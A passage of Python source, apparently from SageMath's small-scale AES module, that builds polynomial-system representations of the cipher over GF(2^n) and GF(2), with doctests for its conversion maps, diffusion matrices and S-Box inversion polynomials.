Polynomial Sequence with 36 Polynomials in 28 Variables
sage: F.part(0)
(P000 + w100 + k000, P001 + w101 + k001, P002 + w102 + k002, P003 + w103 + k003)
sage: F.part(-2)
(k100 + x100 + x102 + x103 + C000, k101 + x100 + x101 + x103 + C001 + 1, ...)
We show that the (returned) key is a solution to the returned system::
sage: sr = mq.SR(3,4,4,8, star=True, gf2=True, polybori=True)
sage: F,s = sr.polynomial_system()
sage: F.subs(s).groebner_basis() # long time
Polynomial Sequence with 1248 Polynomials in 1248 Variables
"""
plaintext = P
key = K
ciphertext = C
system = []
n = self._n
data = []
R = self.R
r,c,e = self.r,self.c,self.e
for d in (plaintext, key, ciphertext):
if d is None:
data.append( None )
elif isinstance(d, (tuple, list)):
if isinstance(d[0], integer_types):
d = [GF(2)(_) for _ in d]
if len(d) == r*c*e and (d[0].parent() is R or d[0].parent() == R):
data.append( Matrix(R,r*c*e,1,d) )
continue
try:
data.append( self.phi(self.state_array(d)) )
except ValueError: # GF2 vectors maybe?
data.append( self.vector(d) )
elif self.is_state_array(d):
data.append( self.phi(d) )
elif self.is_vector(d):
data.append( d )
else:
data.append( False )
plaintext, key, ciphertext = data
if plaintext is False:
raise TypeError("type %s of P not understood"%(type(plaintext)))
elif plaintext is None:
plaintext = self.random_element("vector")
if key is None:
key = self.random_element("vector")
elif key is False and ciphertext is False:
raise TypeError("type %s of K not understood"%(type(key)))
if ciphertext is None:
ciphertext = self(plaintext, key)
elif ciphertext is False:
raise TypeError("type %s of C not understood"%(type(ciphertext)))
for i in range(n+1):
system.append( self.round_polynomials(i, plaintext, ciphertext) )
system.append( self.key_schedule_polynomials(i) )
if key is not None:
K = dict(zip(self.vars("k", 0), key.list()))
else:
K = None
return PolynomialSequence(self.R, system), K
class SR_gf2n(SR_generic):
r"""
Small Scale Variants of the AES polynomial system constructor over
`\GF{2^n}`.
"""
def vector(self, d=None):
"""
Constructs a vector suitable for the algebraic representation of
SR, i.e. BES.
INPUT:
- ``d`` - values for vector, must be understood by ``self.phi`` (default:``None``)
EXAMPLES::
sage: sr = mq.SR()
sage: sr
SR(1,1,1,4)
sage: k = sr.base_ring()
sage: A = Matrix(k, 1, 1, [k.gen()])
sage: sr.vector(A)
[ a]
[ a^2]
[ a + 1]
[a^2 + 1]
"""
r = self.r
c = self.c
e = self.e
k = self.base_ring()
if d is None:
return Matrix(k, r*c*e, 1)
elif d.ncols() == c and d.nrows() == r and d.base_ring() == k:
return Matrix(k, r*c*e, 1, self.phi(d).transpose().list())
def is_vector(self, d):
"""
Return ``True`` if ``d`` can be used as a vector for ``self``.
EXAMPLES::
sage: sr = mq.SR()
sage: sr
SR(1,1,1,4)
sage: k = sr.base_ring()
sage: A = Matrix(k, 1, 1, [k.gen()])
sage: B = sr.vector(A)
sage: sr.is_vector(A)
False
sage: sr.is_vector(B)
True
"""
return is_Matrix(d) and \
d.nrows() == self.r*self.c*self.e and \
d.ncols() == 1 and \
d.base_ring() == self.base_ring()
def phi(self, l):
r"""
The operation `\phi` from [MR2002]_
Projects state arrays to their algebraic representation.
INPUT:
- ``l`` - element to perform `\phi` on.
EXAMPLES::
sage: sr = mq.SR(2, 1, 2, 4)
sage: k = sr.base_ring()
sage: A = matrix(k, 1, 2, [k.gen(), 0] )
sage: sr.phi(A)
[ a 0]
[ a^2 0]
[ a + 1 0]
[a^2 + 1 0]
"""
ret = []
if is_Matrix(l):
for e in l.transpose().list():
ret += [e**(2**i) for i in range(self.e)]
else:
for e in l:
ret += [e**(2**i) for i in range(self.e)]
if isinstance(l, list):
return ret
elif isinstance(l, tuple):
return tuple(ret)
elif is_Matrix(l):
return Matrix(l.base_ring(), l.ncols(), l.nrows()*self.e, ret).transpose()
else:
raise TypeError
def antiphi(self, l):
"""
The operation `\phi^{-1}` from [MR2002]_ or the inverse of ``self.phi``.
INPUT:
- ``l`` -- a vector in the sense of :meth:`is_vector`
EXAMPLES::
sage: sr = mq.SR()
sage: A = sr.random_state_array()
sage: A
[a^2]
sage: sr.antiphi(sr.phi(A)) == A
True
"""
if is_Matrix(l):
ret = [e for e in l.transpose().list()[0:-1:self.e]]
else:
ret = [e for e in l[0:-1:self.e]]
if isinstance(l, list):
return ret
elif isinstance(l, tuple):
return tuple(ret)
elif is_Matrix(l):
return Matrix(self.base_ring(), l.ncols(), l.nrows() // self.e,
ret).transpose()
else:
raise TypeError
def shift_rows_matrix(self):
"""
Return the ``ShiftRows`` matrix.
EXAMPLES::
sage: sr = mq.SR(1, 2, 2, 4)
sage: s = sr.random_state_array()
sage: r1 = sr.shift_rows(s)
sage: r2 = sr.state_array( sr.shift_rows_matrix() * sr.vector(s) )
sage: r1 == r2
True
"""
e = self.e
r = self.r
c = self.c
k = self.base_ring()
bs = r*c*e
shift_rows = Matrix(k, bs, bs)
I = MatrixSpace(k, e, e)(1)
for x in range(0, c):
for y in range(0, r):
_r = ((x*r)+y) * e
_c = (((x*r)+((r+1)*y)) * e) % bs
self._insert_matrix_into_matrix(shift_rows, I, _r, _c)
return shift_rows
def lin_matrix(self, length = None):
"""
Return the ``Lin`` matrix.
If no ``length`` is provided, the standard state space size is
used. The key schedule calls this method with an explicit
length argument because only ``self.r`` S-Box applications are
performed in the key schedule.
INPUT:
- ``length`` - length of state space (default: ``None``)
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 4)
sage: sr.lin_matrix()
[ a^2 + 1 1 a^3 + a^2 a^2 + 1]
[ a a 1 a^3 + a^2 + a + 1]
[ a^3 + a a^2 a^2 1]
[ 1 a^3 a + 1 a + 1]
"""
r = self.r
c = self.c
e = self.e
k = self.k
if length is None:
length = r*c
lin = Matrix(self.base_ring(), length*e, length*e)
if e == 4:
l = [ k.fetch_int(x) for x in (5, 1, 12, 5) ]
for k in range( 0, length ):
for i in range(0, 4):
for j in range(0, 4):
lin[k*4+j, k*4+i] = l[(i-j)%4] ** (2**j)
elif e == 8:
l = [ k.fetch_int(x) for x in (5, 9, 249, 37, 244, 1, 181, 143) ]
for k in range( 0, length ):
for i in range(0, 8):
for j in range(0, 8):
lin[k*8+j, k*8+i] = l[(i-j)%8] ** (2**j)
return lin
def mix_columns_matrix(self):
"""
Return the ``MixColumns`` matrix.
EXAMPLES::
sage: sr = mq.SR(1, 2, 2, 4)
sage: s = sr.random_state_array()
sage: r1 = sr.mix_columns(s)
sage: r2 = sr.state_array(sr.mix_columns_matrix() * sr.vector(s))
sage: r1 == r2
True
"""
def D(b):
"""
Return the `e x e` matrix `D` with `b^i` along the
diagonal.
EXAMPLES::
sage: sr = mq.SR(1, 2, 1, 4)
sage: sr.mix_columns_matrix() # indirect doctest
[ a + 1 0 0 0 a 0 0 0]
[ 0 a^2 + 1 0 0 0 a^2 0 0]
[ 0 0 a 0 0 0 a + 1 0]
[ 0 0 0 a^2 0 0 0 a^2 + 1]
[ a 0 0 0 a + 1 0 0 0]
[ 0 a^2 0 0 0 a^2 + 1 0 0]
[ 0 0 a + 1 0 0 0 a 0]
[ 0 0 0 a^2 + 1 0 0 0 a^2]
"""
D = Matrix(self.base_ring(), self._e, self._e)
for i in range(self._e):
D[i, i] = b**(2**i)
return D
r = self.r
c = self.c
e = self.e
k = self.k
a = k.gen()
M = Matrix(k, r*e, r*e)
if r == 1:
self._insert_matrix_into_matrix(M, D(1), 0, 0)
elif r == 2:
self._insert_matrix_into_matrix(M, D(a+1), 0, 0)
self._insert_matrix_into_matrix(M, D(a+1), e, e)
self._insert_matrix_into_matrix(M, D(a), e, 0)
self._insert_matrix_into_matrix(M, D(a), 0, e)
elif r == 4:
self._insert_matrix_into_matrix(M, D(a), 0, 0)
self._insert_matrix_into_matrix(M, D(a), e, e)
self._insert_matrix_into_matrix(M, D(a), 2*e, 2*e)
self._insert_matrix_into_matrix(M, D(a), 3*e, 3*e)
self._insert_matrix_into_matrix(M, D(a+1), 0, e)
self._insert_matrix_into_matrix(M, D(a+1), e, 2*e)
self._insert_matrix_into_matrix(M, D(a+1), 2*e, 3*e)
self._insert_matrix_into_matrix(M, D(a+1), 3*e, 0)
self._insert_matrix_into_matrix(M, D(1), 0, 2*e)
self._insert_matrix_into_matrix(M, D(1), e, 3*e)
self._insert_matrix_into_matrix(M, D(1), 2*e, 0)
self._insert_matrix_into_matrix(M, D(1), 3*e, 1*e)
self._insert_matrix_into_matrix(M, D(1), 0, 3*e)
self._insert_matrix_into_matrix(M, D(1), e, 0)
self._insert_matrix_into_matrix(M, D(1), 2*e, 1*e)
self._insert_matrix_into_matrix(M, D(1), 3*e, 2*e)
mix_columns = Matrix(k, r*c*e, r*c*e)
for i in range(c):
self._insert_matrix_into_matrix(mix_columns, M, r*e*i, r*e*i)
return mix_columns
def inversion_polynomials(self, xi, wi, length):
"""
Return polynomials to represent the inversion in the AES S-Box.
INPUT:
- ``xi`` - output variables
- ``wi`` - input variables
- ``length`` - length of both lists
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 8)
sage: R = sr.ring()
sage: xi = Matrix(R, 8, 1, sr.vars('x', 1))
sage: wi = Matrix(R, 8, 1, sr.vars('w', 1))
sage: sr.inversion_polynomials(xi, wi, 8)
[x100*w100 + 1,
x101*w101 + 1,
x102*w102 + 1,
x103*w103 + 1,
x104*w104 + 1,
x105*w105 + 1,
x106*w106 + 1,
x107*w107 + 1]
"""
return [xi[j, 0]*wi[j, 0] + 1 for j in range(length)]
def field_polynomials(self, name, i, l=None):
"""
Return list of conjugacy polynomials for a given round ``i``
and name ``name``.
INPUT:
- ``name`` - variable name
- ``i`` - round number
- ``l`` - r\*c (default: ``None``)
EXAMPLES::
sage: sr = mq.SR(3, 1, 1, 8)
sage: sr.field_polynomials('x', 2)
[x200^2 + x201,
x201^2 + x202,
x202^2 + x203,
x203^2 + x204,
x204^2 + x205,
x205^2 + x206,
x206^2 + x207,
x207^2 + x200]
"""
r = self._r
c = self._c
e = self._e
n = self._n
if l is None:
l = r*c
_vars = self.vars(name, i, l, e)
return [_vars[e*j+i]**2 - _vars[e*j+(i+1)%e] for j in range(l) for i in range(e)]
class SR_gf2(SR_generic):
def __init__(self, n=1, r=1, c=1, e=4, star=False, **kwargs):
r"""
Small Scale Variants of the AES polynomial system constructor over
`\GF{2}`. See help for SR.
EXAMPLES::
sage: sr = mq.SR(gf2=True)
sage: sr
SR(1,1,1,4)
"""
SR_generic.__init__(self, n, r, c, e, star, **kwargs)
self._correct_only = kwargs.get("correct_only", False)
self._biaffine_only = kwargs.get("biaffine_only", True)
def vector(self, d=None):
"""
Constructs a vector suitable for the algebraic representation of
SR.
INPUT:
- ``d`` - values for vector (default: ``None``)
EXAMPLES::
sage: sr = mq.SR(gf2=True)
sage: sr
SR(1,1,1,4)
sage: k = sr.base_ring()
sage: A = Matrix(k, 1, 1, [k.gen()])
sage: sr.vector(A)
[0]
[0]
[1]
[0]
"""
r = self.r
c = self.c
e = self.e
k = GF(2)
if d is None:
return Matrix(k, r*c*e, 1)
elif is_Matrix(d) and d.ncols() == c and d.nrows() == r and d.base_ring() == self.k:
l = flatten([self.phi(x) for x in d.transpose().list()], (Vector_modn_dense,list,tuple))
return Matrix(k, r*c*e, 1, l)
elif isinstance(d, (list, tuple)):
if len(d) == self.r*self.c:
l = flatten([self.phi(x) for x in d], (Vector_modn_dense,list,tuple))
return Matrix(k, r*c*e, 1, l)
elif len(d) == self.r*self.c*self.e:
return Matrix(k, r*c*e, 1, d)
else:
raise TypeError
else:
raise TypeError
def is_vector(self, d):
"""
Return ``True`` if the given matrix satisfies the conditions
for a vector as it appears in the algebraic expression of
``self``.
INPUT:
- ``d`` - matrix
EXAMPLES::
sage: sr = mq.SR(gf2=True)
sage: sr
SR(1,1,1,4)
sage: k = sr.base_ring()
sage: A = Matrix(k, 1, 1, [k.gen()])
sage: B = sr.vector(A)
sage: sr.is_vector(A)
False
sage: sr.is_vector(B)
True
"""
return is_Matrix(d) and \
d.nrows() == self.r*self.c*self.e and \
d.ncols() == 1 and \
d.base_ring() == GF(2)
def phi(self, l, diffusion_matrix=False):
r"""
The operation `\phi` from [MR2002]_
Given a list/matrix of elements in `\GF{2^e}`, return a
matching list/matrix of elements in `\GF{2}`.
INPUT:
- ``l`` - element to perform `\phi` on.
- ``diffusion_matrix`` - if ``True``, the given matrix ``l`` is
transformed to a matrix which performs the same operation
over `\GF{2}` as ``l`` over `\GF{2^n}` (default: ``False``).
EXAMPLES::
sage: sr = mq.SR(2, 1, 2, 4, gf2=True)
sage: k = sr.base_ring()
sage: A = matrix(k, 1, 2, [k.gen(), 0] )
sage: sr.phi(A)
[0 0]
[0 0]
[1 0]
[0 0]
"""
ret = []
r, c, e = self.r, self.c, self.e
# handle diffusion layer matrices first
if is_Matrix(l) and diffusion_matrix and \
l.nrows() == r*c and l.ncols() == r*c and \
l.base_ring() == self.k:
B = Matrix(GF(2), r*c*e, r*c*e)
for x in range(r*c):
for y in range(r*c):
T = self._mul_matrix(l[x, y])
self._insert_matrix_into_matrix(B, T, x*e, y*e)
return B
# ground field elements
if l in self.k:
return list(reversed(l._vector_()))
# remaining matrices
if is_Matrix(l):
for x in l.transpose().list():
ret += list(reversed(x._vector_()))
# or lists
else:
for x in l:
ret += list(reversed(x._vector_()))
if isinstance(l, list):
return ret
elif isinstance(l, tuple):
return tuple(ret)
elif is_Matrix(l):
return Matrix(GF(2), l.ncols(), l.nrows()*self.e, ret).transpose()
else: raise TypeError
def antiphi(self, l):
"""
The operation `\phi^{-1}` from [MR2002]_ or the inverse of ``self.phi``.
INPUT:
- ``l`` - a vector in the sense of ``self.is_vector``
EXAMPLES::
sage: sr = mq.SR(gf2=True)
sage: A = sr.random_state_array()
sage: A
[a^2]
sage: sr.antiphi(sr.phi(A)) == A
True
"""
e = self.e
V = self.k.vector_space()
if is_Matrix(l):
l2 = l.transpose().list()
else:
l2 = l
ret = []
for i in range(0, len(l2), e):
ret.append( self.k(V(list(reversed(l2[i:i+e])))) )
if isinstance(l, list):
return ret
elif isinstance(l, tuple):
return tuple(ret)
elif is_Matrix(l):
return Matrix(self.base_ring(), self.r *self.c, 1, ret)
else:
raise TypeError
def shift_rows_matrix(self):
"""
Return the ``ShiftRows`` matrix.
EXAMPLES::
sage: sr = mq.SR(1, 2, 2, 4, gf2=True)
sage: s = sr.random_state_array()
sage: r1 = sr.shift_rows(s)
sage: r2 = sr.state_array( sr.shift_rows_matrix() * sr.vector(s) )
sage: r1 == r2
True
"""
r = self.r
c = self.c
k = self.k
bs = r*c
shift_rows = Matrix(k, r*c, r*c)
for x in range(0, c):
for y in range(0, r):
_r = ((x*r)+y)
_c = ((x*r)+((r+1)*y)) % bs
shift_rows[_r, _c] = 1
return self.phi(shift_rows, diffusion_matrix=True)
def mix_columns_matrix(self):
"""
Return the ``MixColumns`` matrix.
EXAMPLES::
sage: sr = mq.SR(1, 2, 2, 4, gf2=True)
sage: s = sr.random_state_array()
sage: r1 = sr.mix_columns(s)
sage: r2 = sr.state_array(sr.mix_columns_matrix() * sr.vector(s))
sage: r1 == r2
True
"""
r = self.r
c = self.c
k = self.k
a = k.gen()
if r == 1:
M = Matrix(k, r, r, 1)
elif r == 2:
M = Matrix(k, r, r, [a+1, a, a, a+1])
elif r == 4:
M = Matrix(k, r, [a, a+1, 1, 1, \
1, a, a+1, 1, \
1, 1, a, a+1, \
a+1, 1, 1, a])
mix_columns = Matrix(k, r*c, r*c)
for i in range(c):
self._insert_matrix_into_matrix(mix_columns, M, r*i, r*i)
return self.phi(mix_columns, diffusion_matrix=True)
def lin_matrix(self, length=None):
"""
Return the ``Lin`` matrix.
If no ``length`` is provided, the standard state space size is
used. The key schedule calls this method with an explicit
length argument because only ``self.r`` S-Box applications are
performed in the key schedule.
INPUT:
- ``length`` - length of state space (default: ``None``)
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 4, gf2=True)
sage: sr.lin_matrix()
[1 0 1 1]
[1 1 0 1]
[1 1 1 0]
[0 1 1 1]
"""
r, c, e = self.r, self.c, self.e
if length is None:
length = r*c
if e == 8:
Z = Matrix(GF(2), 8, 8, [1, 0, 0, 0, 1, 1, 1, 1, \
1, 1, 0, 0, 0, 1, 1, 1, \
1, 1, 1, 0, 0, 0, 1, 1, \
1, 1, 1, 1, 0, 0, 0, 1, \
1, 1, 1, 1, 1, 0, 0, 0, \
0, 1, 1, 1, 1, 1, 0, 0, \
0, 0, 1, 1, 1, 1, 1, 0, \
0, 0, 0, 1, 1, 1, 1, 1])
else:
Z = Matrix(GF(2), 4, 4, [1, 1, 1, 0, \
0, 1, 1, 1, \
1, 0, 1, 1, \
1, 1, 0, 1])
Z = Z.transpose() # account for endianess mismatch
lin = Matrix(GF(2), length*e, length*e)
for i in range(length):
self._insert_matrix_into_matrix(lin, Z, i*e, i*e)
return lin
def _mul_matrix(self, x):
r"""
Given an element `x` in self.base_ring(), return a matrix
which performs the same operation on a when interpreted over
`\GF{2^e}` as `x` over `\GF{2^e}`.
INPUT:
- ``x`` - an element in self.base_ring()
EXAMPLES::
sage: sr = mq.SR(gf2=True)
sage: a = sr.k.gen()
sage: A = sr._mul_matrix(a^2+1)
sage: sr.antiphi( A * sr.vector([a+1]) )
[a^3 + a^2 + a + 1]
::
sage: (a^2 + 1)*(a+1)
a^3 + a^2 + a + 1
"""
a = self.k.gen()
k = self.k
e = self.e
a = k.gen()
columns = []
for i in reversed(range(e)):
columns.append( list(reversed((x * a**i)._vector_())) )
return Matrix(GF(2), e, e, columns).transpose()
def _square_matrix(self):
"""
Return a matrix of dimension self.e x self.e which performs the
squaring operation over `GF(2^n)` on vectors of length e.
EXAMPLES::
sage: sr = mq.SR(gf2=True)
sage: a = sr.k.gen()
sage: S = sr._square_matrix()
sage: sr.antiphi( S * sr.vector([a^3+1]) )
[a^3 + a^2 + 1]
::
sage: (a^3 + 1)^2
a^3 + a^2 + 1
"""
a = self.k.gen()
e = self.e
columns = []
for i in reversed(range(e)):
columns.append( list(reversed(((a**i)**2)._vector_())) )
return Matrix(GF(2), e , e, columns).transpose()
def inversion_polynomials_single_sbox(self, x=None, w=None, biaffine_only=None, correct_only=None):
"""
Return inversion polynomials of a single S-Box.
INPUT:
- ``xi`` - output variables
- ``wi`` - input variables
- ``length`` - length of both lists
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 8, gf2=True)
sage: len(sr.inversion_polynomials_single_sbox())
24
sage: len(sr.inversion_polynomials_single_sbox(correct_only=True))
23
sage: len(sr.inversion_polynomials_single_sbox(biaffine_only=False))
40
sage: len(sr.inversion_polynomials_single_sbox(biaffine_only=False, correct_only=True))
39
sage: sr = mq.SR(1, 1, 1, 8, gf2=True)
sage: l0 = sr.inversion_polynomials_single_sbox(); len(l0)
24
sage: l1 = sr.inversion_polynomials_single_sbox(correct_only=True); len(l1)
23
sage: l2 = sr.inversion_polynomials_single_sbox(biaffine_only=False); len(l2)
40
sage: l3 = sr.inversion_polynomials_single_sbox(biaffine_only=False, correct_only=True); len(l3)
39
sage: set(l0) == set(sr._inversion_polynomials_single_sbox())
True
sage: set(l1) == set(sr._inversion_polynomials_single_sbox(correct_only=True))
True
sage: set(l2) == set(sr._inversion_polynomials_single_sbox(biaffine_only=False))
True
sage: set(l3) == set(sr._inversion_polynomials_single_sbox(biaffine_only=False, correct_only=True))
True
sage: sr = mq.SR(1, 1, 1, 4, gf2=True)
sage: l0 = sr.inversion_polynomials_single_sbox(); len(l0)
12
sage: l1 = sr.inversion_polynomials_single_sbox(correct_only=True); len(l1)
11
sage: l2 = sr.inversion_polynomials_single_sbox(biaffine_only=False); len(l2)
20
sage: l3 = sr.inversion_polynomials_single_sbox(biaffine_only=False, correct_only=True); len(l3)
19
sage: set(l0) == set(sr._inversion_polynomials_single_sbox())
True
sage: set(l1) == set(sr._inversion_polynomials_single_sbox(correct_only=True))
True
sage: set(l2) == set(sr._inversion_polynomials_single_sbox(biaffine_only=False))
True
sage: set(l3) == set(sr._inversion_polynomials_single_sbox(biaffine_only=False, correct_only=True))
True
"""
e = self.e
if biaffine_only is None:
biaffine_only = self._biaffine_only
if correct_only is None:
correct_only = self._correct_only
if x is None and w is None:
# make sure it prints like in the book.
names = ["w%d" % i for i in reversed(range(e))] + ["x%d"%i for i in reversed(range(e))]
P = PolynomialRing(GF(2), e*2, names, order='lex')
x = P.gens()[e:]
w = P.gens()[:e]
else:
if isinstance(x, (tuple, list)):
P = x[0].parent()
elif is_Matrix(x):
P = x.base_ring()
else:
raise TypeError("x not understood")
if is_Matrix(x):
x = x.column(0).list()
if is_Matrix(w):
w = w.column(0).list()
if e == 4:
w3,w2,w1,w0 = w
x3,x2,x1,x0 = x
l = [w3*x3 + w3*x0 + w2*x1 + w1*x2 + w0*x3,
w3*x3 + w3*x2 + w2*x3 + w2*x0 + w1*x1 + w0*x2,
w3*x2 + w3*x1 + w2*x3 + w2*x2 + w1*x3 + w1*x0 + w0*x1,
w3*x3 + w3*x2 + w3*x0 + w2*x2 + w1*x3 + w1*x1 + w0*x3 + x3,
w3*x1 + w2*x3 + w2*x2 + w2*x0 + w1*x2 + w0*x3 + w0*x1 + x2,
w3*x3 + w3*x2 + w3*x1 + w2*x1 + w1*x3 + w1*x2 + w1*x0 + w0*x2 + x1,
w3*x2 + w2*x3 + w2*x1 + w1*x3 + w0*x2 + w0*x0 + x0,
w3*x3 + w3*x1 + w3*x0 + w3 + w2*x3 + w2*x2 + w1*x1 + w0*x3,
w3*x2 + w3*x0 + w2*x2 + w2*x1 + w2 + w1*x3 + w1*x0 + w0*x2,
w3*x3 + w3*x1 + w2*x3 + w2*x1 + w2*x0 + w1*x3 + w1*x2 + w1 + w0*x1,
w3*x2 + w3*x1 + w2*x3 + w2*x0 + w1*x2 + w0*x0 + w0]
if not correct_only:
l.append(w3*x1 + w2*x2 + w1*x3 + w0*x0 + 1)
if not biaffine_only:
l.extend([w3*x2 + w3*x1 + w3*x0 + w2*x3 + w2*x1 + w1*x3 + w1*x2 + w0*x3 + x3**2 + x3*x2 + x3*x1 + x2**2 + x1**2,
w3*x2 + w2*x2 + w2*x1 + w2*x0 + w1*x3 + w1*x1 + w0*x3 + w0*x2 + x3*x2 + x3*x1 + x3*x0 + x2**2 + x2*x1 + x2*x0 + x1*x0,
w3*x2 + w3*x1 + w2*x2 + w1*x2 + w1*x1 + w1*x0 + w0*x3 + w0*x1 + x3**2 + x3*x2 + x2*x0 + x1*x0,
w3*x3 + w3*x1 + w2*x3 + w2*x2 + w1*x3 + w0*x3 + w0*x2 + w0*x1 + w0*x0 + x3*x1 + x2*x1 + x2*x0 + x0**2,
w3**2 + w3*w2 + w3*w1 + w3*x2 + w3*x1 + w3*x0 + w2**2 + w2*x3 + w2*x1 + w1**2 + w1*x3 + w1*x2 + w0*x3,
w3*w2 + w3*w1 + w3*w0 + w3*x1 + w3*x0 + w2**2 + w2*w1 + w2*w0 + w2*x3 + w2*x2 + w2*x0 + w1*w0 + w1*x2 + w1*x1 + w0*x2,
w3**2 + w3*w2 + w3*x0 + w2*w0 + w2*x3 + w2*x2 + w2*x1 + w1*w0 + w1*x3 + w1*x1 + w1*x0 + w0*x1,
w3*w1 + w3*x3 + w3*x2 + w3*x1 + w3*x0 + w2*w1 + w2*w0 + w2*x2 + w2*x0 + w1*x3 + w1*x0 + w0**2 + w0*x0])
return l
else:
w7,w6,w5,w4,w3,w2,w1,w0 = w
x7,x6,x5,x4,x3,x2,x1,x0 = x
l = [w7*x7 + w7*x5 + w7*x4 + w7*x0 + w6*x6 + w6*x5 + w6*x1 + w5*x7 + w5*x6 + w5*x2 + w4*x7 + w4*x3 + w3*x4 + w2*x5 + w1*x6 + w0*x7,
w7*x6 + w7*x4 + w7*x3 + w6*x7 + w6*x5 + w6*x4 + w6*x0 + w5*x6 + w5*x5 + w5*x1 + w4*x7 + w4*x6 + w4*x2 + w3*x7 + w3*x3 + w2*x4 + w1*x5 + w0*x6,
w7*x5 + w7*x3 + w7*x2 + w6*x6 + w6*x4 + w6*x3 + w5*x7 + w5*x5 + w5*x4 + w5*x0 + w4*x6 + w4*x5 + w4*x1 + w3*x7 + w3*x6 + w3*x2 + w2*x7 + w2*x3 + w1*x4 + w0*x5,
w7*x7 + w7*x4 + w7*x2 + w7*x1 + w6*x5 + w6*x3 + w6*x2 + w5*x6 + w5*x4 + w5*x3 + w4*x7 + w4*x5 + w4*x4 + w4*x0 + w3*x6 + w3*x5 + w3*x1 + w2*x7 + w2*x6 + w2*x2 + w1*x7 + w1*x3 + w0*x4,
w7*x7 + w7*x6 + w7*x5 + w7*x4 + w7*x3 + w7*x1 + w6*x7 + w6*x6 + w6*x5 + w6*x4 + w6*x2 + w5*x7 + w5*x6 + w5*x5 + w5*x3 + w4*x7 + w4*x6 + w4*x4 + w3*x7 + w3*x5 + w3*x0 + w2*x6 + w2*x1 \
+ w1*x7 + w1*x2 + w0*x3,
w7*x6 + w7*x3 + w7*x2 + w6*x7 + w6*x4 + w6*x3 + w5*x5 + w5*x4 + w4*x6 + w4*x5 + w3*x7 + w3*x6 + w2*x7 + w2*x0 + w1*x1 + w0*x2,
w7*x7 + w7*x5 + w7*x2 + w7*x1 + w6*x6 + w6*x3 + w6*x2 + w5*x7 + w5*x4 + w5*x3 + w4*x5 + w4*x4 + w3*x6 + w3*x5 + w2*x7 + w2*x6 + w1*x7 + w1*x0 + w0*x1,
w7*x6 + w7*x5 + w7*x2 + w7*x0 + w6*x7 + w6*x4 + w6*x3 + w5*x7 + w5*x6 + w5*x3 + w5*x1 + w4*x5 + w4*x4 + w3*x7 + w3*x4 + w3*x2 + w2*x6 + w2*x5 + w1*x5 + w1*x3 + w0*x7 + w0*x6 + x7,
w7*x6 + w7*x3 + w7*x2 + w6*x6 + w6*x5 + w6*x2 + w6*x0 + w5*x7 + w5*x4 + w5*x3 + w4*x7 + w4*x6 + w4*x3 + w4*x1 + w3*x5 + w3*x4 + w2*x7 + w2*x4 + w2*x2 + w1*x6 + w1*x5 + w0*x5 + w0*x3 \
+ x6,
w7*x7 + w7*x5 + w7*x4 + w7*x1 + w6*x6 + w6*x3 + w6*x2 + w5*x6 + w5*x5 + w5*x2 + w5*x0 + w4*x7 + w4*x4 + w4*x3 + w3*x7 + w3*x6 + w3*x3 + w3*x1 + w2*x5 + w2*x4 + w1*x7 + w1*x4 + w1*x2 \
+ w0*x6 + w0*x5 + x5,
w7*x7 + w7*x5 + w7*x2 + w7*x1 + w6*x7 + w6*x5 + w6*x4 + w6*x1 + w5*x6 + w5*x3 + w5*x2 + w4*x6 + w4*x5 + w4*x2 + w4*x0 + w3*x7 + w3*x4 + w3*x3 + w2*x7 + w2*x6 + w2*x3 + w2*x1 + w1*x5 \
+ w1*x4 + w0*x7 + w0*x4 + w0*x2 + x4,
w7*x5 + w7*x4 + w7*x3 + w7*x2 + w6*x5 + w6*x4 + w6*x3 + w6*x2 + w6*x1 + w5*x6 + w5*x5 + w5*x4 + w5*x3 + w4*x6 + w4*x5 + w4*x4 + w4*x3 + w4*x2 + w3*x7 + w3*x6 + w3*x5 + w3*x4 + w3*x0 \
+ w2*x7 + w2*x6 + w2*x5 + w2*x4 + w2*x3 + w1*x7 + w1*x6 + w1*x5 + w1*x1 + w0*x7 + w0*x6 + w0*x5 + w0*x4 + x3,
w7*x7 + w7*x6 + w7*x5 + w7*x4 + w7*x3 + w7*x1 + w6*x7 + w6*x5 + w6*x2 + w5*x7 + w5*x6 + w5*x5 + w5*x4 + w5*x2 + w4*x6 + w4*x3 + w3*x7 + w3*x6 + w3*x5 + w3*x3 + w2*x7 + w2*x4 + w2*x0 \
+ w1*x7 + w1*x6 + w1*x4 + w0*x5 + w0*x1 + x2,
w7*x6 + w7*x4 + w7*x1 + w6*x7 + w6*x6 + w6*x5 + w6*x4 + w6*x3 + w6*x1 + w5*x7 + w5*x5 + w5*x2 + w4*x7 + w4*x6 + w4*x5 + w4*x4 + w4*x2 + w3*x6 + w3*x3 + w2*x7 + w2*x6 + w2*x5 + w2*x3 \
+ w1*x7 + w1*x4 + w1*x0 + w0*x7 + w0*x6 + w0*x4 + x1,
w7*x7 + w7*x4 + w7*x3 + w6*x7 + w6*x6 + w6*x3 + w6*x1 + w5*x5 + w5*x4 + w4*x7 + w4*x4 + w4*x2 + w3*x6 + w3*x5 + w2*x5 + w2*x3 + w1*x7 + w1*x6 + w0*x6 + w0*x4 + w0*x0 + x0,
w7*x6 + w7*x5 + w7*x3 + w7*x0 + w7 + w6*x7 + w6*x5 + w6*x2 + w6*x0 + w5*x7 + w5*x4 + w5*x2 + w5*x1 + w4*x6 + w4*x4 + w4*x3 + w3*x6 + w3*x5 + w3*x1 + w2*x7 + w2*x3 + w1*x5 + w0*x7,
w7*x5 + w7*x4 + w7*x2 + w6*x7 + w6*x6 + w6*x4 + w6*x1 + w6 + w5*x6 + w5*x3 + w5*x1 + w5*x0 + w4*x5 + w4*x3 + w4*x2 + w3*x7 + w3*x5 + w3*x4 + w3*x0 + w2*x7 + w2*x6 + w2*x2 + w1*x4 \
+ w0*x6,
w7*x7 + w7*x4 + w7*x3 + w7*x1 + w6*x6 + w6*x5 + w6*x3 + w6*x0 + w5*x7 + w5*x5 + w5*x2 + w5*x0 + w5 + w4*x7 + w4*x4 + w4*x2 + w4*x1 + w3*x6 + w3*x4 + w3*x3 + w2*x6 + w2*x5 + w2*x1 \
+ w1*x7 + w1*x3 + w0*x5,
w7*x7 + w7*x6 + w7*x3 + w7*x2 + w7*x0 + w6*x5 + w6*x4 + w6*x2 + w5*x7 + w5*x6 + w5*x4 + w5*x1 + w4*x6 + w4*x3 + w4*x1 + w4*x0 + w4 + w3*x5 + w3*x3 + w3*x2 + w2*x7 + w2*x5 + w2*x4 \
+ w2*x0 + w1*x7 + w1*x6 + w1*x2 + w0*x4,
